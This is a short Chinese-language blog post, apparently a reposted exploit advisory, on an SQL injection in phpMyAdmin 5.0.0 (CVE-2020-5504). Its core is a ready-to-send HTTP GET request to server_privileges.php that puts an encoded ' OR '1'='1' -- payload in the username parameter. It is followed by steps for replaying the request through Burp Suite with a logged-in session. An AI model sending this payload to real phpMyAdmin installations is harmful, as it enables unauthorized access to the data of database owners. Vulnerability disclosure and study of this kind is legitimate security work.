phpMyAdmin 5.0.0 SQL注入漏洞分析与利用

本文详细分析了phpMyAdmin 5.0.0版本中存在的SQL注入漏洞(CVE-2020-5504),提供了完整的漏洞验证代码和复现步骤,涉及通过特定HTTP请求参数进行注入攻击的技术细节。

Exploit标题:phpMyAdmin 5.0.0 - SQL注入

日期:2025-11-25

漏洞作者:CodeSecLab

供应商主页:https://github.com/phpmyadmin/phpmyadmin/

软件链接:https://github.com/phpmyadmin/phpmyadmin/

版本:5.0.0

测试环境:Windows

CVE:CVE-2020-5504

漏洞验证代码

1
2
3
GET /server_privileges.php?ajax_request=true&validate_username=set&username=%27%20OR%20%271%27%3D%271%27%20--%20 HTTP/1.1
Host: phpmyadmin
Connection: close

附加条件:

  • 攻击者必须拥有有效的MySQL账户才能访问服务器。

复现步骤

  1. 登录phpmyadmin。
  2. 使用Burp Suite等Web代理工具拦截并发送恶意请求,确保请求中包含有效的会话cookie。
  3. 观察结果。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计